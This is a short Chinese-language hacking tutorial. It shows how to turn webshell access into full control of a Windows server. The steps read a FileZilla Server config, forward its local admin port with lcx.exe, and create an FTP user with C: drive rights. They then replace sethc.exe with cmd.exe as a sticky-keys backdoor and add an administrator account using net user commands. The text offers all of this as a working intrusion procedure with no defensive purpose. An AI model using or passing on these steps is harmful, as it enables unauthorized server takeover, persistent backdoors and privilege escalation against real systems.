话不多说,我们直接操作!
首先我们通过 webshell 找到 FileZilla 的文件目录,找到 FileZilla Server Interface.xml 文件,打开。我们可以看到它的连接地址:127.0.0.1 及端口:14147,密码这里为空。
在得到以上基本信息后,我们找到可读写文件,上传 lcx.exe 端口转发程序。因为从以上信息我们可以知道,它只侦听在本地的14147端口上。
然后执行端口转发命令:
lcx.exe -tran 14148 127.0.0.1 14147
接着我们在我们本地机器上,通过 FileZilla 的服务端程序,来连接它!地址填写,目标地址端口为转发后的14148 端口,密码为空!
我们成功连接上了!现在我们来添加用户,并将我们的分享目录改为 c: 盘,并赋予足够大的权限!
在拥有账户和 c: 控制权后,我们再通过 FileZilla 的客户端来进行正常连接!我们可以看到成功连接!
现在,我们就用自己准备好的cmd客户端,替换 system32 下的 sethc.exe ,并选择 覆盖 !
最后我们来通过 远程桌面来进行连接!在登录界面,我们连续按 5 下 shift 键,可以看到成功调出 cmd 的命令客户端!
我们来添加一个用户,并将其提升为管理员权限!
net user secist 123 /add
net localgroup administrator secist /add
这样,我们就成功取得了该服务器的控制权限!